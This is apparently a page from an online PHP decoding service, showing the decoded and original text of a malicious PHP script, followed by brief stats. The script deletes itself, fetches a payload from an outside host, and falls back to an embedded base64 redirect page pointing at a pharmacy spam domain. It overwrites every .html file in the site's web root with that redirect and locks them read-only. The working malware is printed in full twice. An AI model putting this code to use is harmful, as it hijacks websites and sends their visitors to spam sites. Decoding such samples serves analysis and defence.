Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php unlink(__FILE__); @ignore_user_abort (true); set_time_limit ( 111000 ); $x..
Decoded Output download
<?php unlink(__FILE__);
@ignore_user_abort (true);
set_time_limit ( 111000 );
$x_domains = explode(',' , "alldrugmall.com");
$ggg = file_get_contents('http://bizmatebd.com/zqmarkets.txt');
//$ggg = '';
//$ggg = '';
if (strlen($ggg) < 10000 )
{
//$x_domains = explode(',' , "cheapmedplace.com");
$ggg = base64_decode("PGh0bWw+DQogICAgPGhlYWQ+DQogICAgICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KICAgICAgICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwO3VybD0jI0xJTktfVVJMIyMiIC8+DQogICAgPC9oZWFkPg0KDQogICAgPGJvZHk+DQogICAgICAgIDxwPllvdSBhcmUgbm90IGxvZ2dlZCBpbiE8L3A+DQogICAgICAgIDxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPg0KICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uID0gIiMjTElOS19VUkwjIyI7DQogICAgICAgIDwvc2NyaXB0Pg0KICAgIDwvYm9keT4NCjwvaHRtbD4NCg==");
}
//$ggg = base64_encode(str_replace( '##LINK_URL##', base64_encode('http://' . $x_domains[array_rand($x_domains)] . '/') , $ggg ));
//$ggg = base64_encode(str_replace( '##LINK_URL##', 'http://' . $x_domains[array_rand($x_domains)] . '/' , $ggg ));
$ggg = base64_encode(str_replace( '##LINK_URL##', 'https://' . $x_domains[array_rand($x_domains)] . '/' , $ggg ));
//echo $ggg;
$root = $_SERVER["DOCUMENT_ROOT"];
if (strpos($root,'/') !== false) {
$path = $root . "/";
}
else $path = $root . "\";
//echo $path . PHP_EOL;
$root = $path;
$shell_url = ((!empty($_SERVER['HTTPS'])) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] ;
foreach(glob($root . '/*.html') as $fname) {
// echo $fname . PHP_EOL;
$files_changed++;
//echo 'INDEX.PHP PATCHED--1111111' . PHP_EOL;
$filepath=$fname;
$basename = preg_replace('/^.+[\\\/]/', '', $filepath);
//echo $basename;
chmod($fname, 0644);
file_put_contents($fname, base64_decode($ggg));
$fp = fopen($fname , 'w');
fwrite($fp, base64_decode($ggg));
fclose($fp);
chmod($fname, 0444);
//echo file_get_contents($fname);
//echo $shell_url . '/' . $basename . PHP_EOL ;
//break;
}
//echo 'Files = ' . $files_changed . ' Links changed in ' . $links_replaced . ' files';
echo 'Domain = ' . $server_domain . ' Files = ' . $files_changed . ' Links changed in ' . $links_replaced . ' files';
?>Did this file decode correctly?
Original Code
<?php unlink(__FILE__);
@ignore_user_abort (true);
set_time_limit ( 111000 );
$x_domains = explode(',' , "alldrugmall.com");
$ggg = file_get_contents('http://bizmatebd.com/zqmarkets.txt');
//$ggg = '';
//$ggg = '';
if (strlen($ggg) < 10000 )
{
//$x_domains = explode(',' , "cheapmedplace.com");
$ggg = base64_decode("PGh0bWw+DQogICAgPGhlYWQ+DQogICAgICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KICAgICAgICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwO3VybD0jI0xJTktfVVJMIyMiIC8+DQogICAgPC9oZWFkPg0KDQogICAgPGJvZHk+DQogICAgICAgIDxwPllvdSBhcmUgbm90IGxvZ2dlZCBpbiE8L3A+DQogICAgICAgIDxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPg0KICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uID0gIiMjTElOS19VUkwjIyI7DQogICAgICAgIDwvc2NyaXB0Pg0KICAgIDwvYm9keT4NCjwvaHRtbD4NCg==");
}
//$ggg = base64_encode(str_replace( '##LINK_URL##', base64_encode('http://' . $x_domains[array_rand($x_domains)] . '/') , $ggg ));
//$ggg = base64_encode(str_replace( '##LINK_URL##', 'http://' . $x_domains[array_rand($x_domains)] . '/' , $ggg ));
$ggg = base64_encode(str_replace( '##LINK_URL##', 'https://' . $x_domains[array_rand($x_domains)] . '/' , $ggg ));
//echo $ggg;
$root = $_SERVER["DOCUMENT_ROOT"];
if (strpos($root,'/') !== false) {
$path = $root . "/";
}
else $path = $root . "\\";
//echo $path . PHP_EOL;
$root = $path;
$shell_url = ((!empty($_SERVER['HTTPS'])) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] ;
foreach(glob($root . '/*.html') as $fname) {
// echo $fname . PHP_EOL;
$files_changed++;
//echo 'INDEX.PHP PATCHED--1111111' . PHP_EOL;
$filepath=$fname;
$basename = preg_replace('/^.+[\\\\\\/]/', '', $filepath);
//echo $basename;
chmod($fname, 0644);
file_put_contents($fname, base64_decode($ggg));
$fp = fopen($fname , 'w');
fwrite($fp, base64_decode($ggg));
fclose($fp);
chmod($fname, 0444);
//echo file_get_contents($fname);
//echo $shell_url . '/' . $basename . PHP_EOL ;
//break;
}
//echo 'Files = ' . $files_changed . ' Links changed in ' . $links_replaced . ' files';
echo 'Domain = ' . $server_domain . ' Files = ' . $files_changed . ' Links changed in ' . $links_replaced . ' files';
Function Calls
| unlink | 1 |
Stats
| MD5 | 63d4c790ccc73a011213a10e54576d05 |
| Eval Count | 0 |
| Decode Time | 86 ms |